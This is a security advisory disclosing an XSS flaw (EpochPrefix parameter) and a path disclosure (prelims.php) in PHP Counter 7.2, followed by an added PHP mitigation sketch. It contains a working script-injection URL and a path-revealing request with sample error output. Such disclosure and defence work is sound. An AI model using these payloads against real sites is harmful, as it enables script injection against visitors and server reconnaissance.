Hi,

I found two vulnerabilities in PHP Counter 7.2.

PHP Counter Vendor: http://www.ekstreme.com/phplabs/phpcounter.php

First, an XSS problem (file phpcounterxss.txt).
Second, a path disclosure vulnerability (file phpcounterdir.txt).

greets,
priestmaster

Mail: <priest@xxxxxxxxxxxxxxxx>
URL: http://www.priestmaster.org

----------------------------------------------------------
---- Team priestmasters PHP Counter 7.2 XSS Advisory ----
----------------------------------------------------------

PHP Counter Vendor: http://www.ekstreme.com/phplabs/phpcounter.php

PHP Counter 7.2 does not filter "<>" tags in the EpochPrefix parameter.
Cross-site scripting and HTML injection are possible.

Exploitation:

http://www.yourwebsite.org/CounterDirectory/index.php?Plugin=All%20Hits&EpochPrefix="></a></div><script>a=/XSS/%0aalert(a.source)</script>

The injected script is called multiple times. XSS is hard to do
because ' and " are filtered.

greets,
priestmaster

URL: http://www.priestmaster.org
Email: priest@xxxxxxxxxxxxxxxx

------------------------------------------------------------
-------- Team priestmasters PHP Counter 7.2 Advisory -------
---------------- Path disclosure vulnerability -------------
------------------------------------------------------------

PHP Counter Vendor: http://www.ekstreme.com/phplabs/phpcounter.php

A path disclosure vuln exists in prelims.php.

Exploitation is simple:

http://www.yoursite.com/CounterPath/prelims.php

Output looks like this:

Fatal error: Call to undefined function: getdawn() in /home/.sites/165/site223/web/Counter/prelims.php on line 63

That's all :-)

priestmaster
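
A mitigation sketch for both issues reported above, added here as an example; it is not PHP Counter's code or the advisory author's. The function names and the COUNTER_ENTRY constant are hypothetical, and it assumes EpochPrefix is echoed into a link's href, which the page does not confirm.

```php
<?php
// Added example: hypothetical helpers, not PHP Counter's source.

// Include-only files (prelims.php in the advisory) refuse direct requests,
// so a missing helper such as getdawn() cannot raise a fatal error there.
// Assumption: the entry script runs define('COUNTER_ENTRY', true) first.
function require_entry_point(): void
{
    if (!defined('COUNTER_ENTRY')) {
        http_response_code(404);
        exit;
    }
}

// Errors go to the server log, never into the response body.
function harden_error_output(): void
{
    ini_set('display_errors', '0');
    ini_set('log_errors', '1');
}

// The behaviour the advisory reports: quotes removed, "<" and ">" untouched.
function strip_quotes_only(string $value): string
{
    return str_replace(["'", '"'], '', $value);
}

// Encode for each context: URL-encode inside the query string, then
// HTML-encode the whole attribute value.
function counter_link(string $plugin, string $epochPrefix): string
{
    $query = http_build_query(['Plugin' => $plugin, 'EpochPrefix' => $epochPrefix]);
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<a href="' . htmlspecialchars('index.php?' . $query, $flags, 'UTF-8') . '">'
         . htmlspecialchars($plugin, $flags, 'UTF-8') . '</a>';
}

define('COUNTER_ENTRY', true);   // stands in for the entry script
harden_error_output();
require_entry_point();

// EpochPrefix value from the advisory's URL, with %0a decoded.
$sample = urldecode('"></a></div><script>a=/XSS/%0aalert(a.source)</script>');
echo "quote filter only: ", strip_quotes_only($sample), "\n";
echo "encoded link:      ", counter_link('All Hits', $sample), "\n";
```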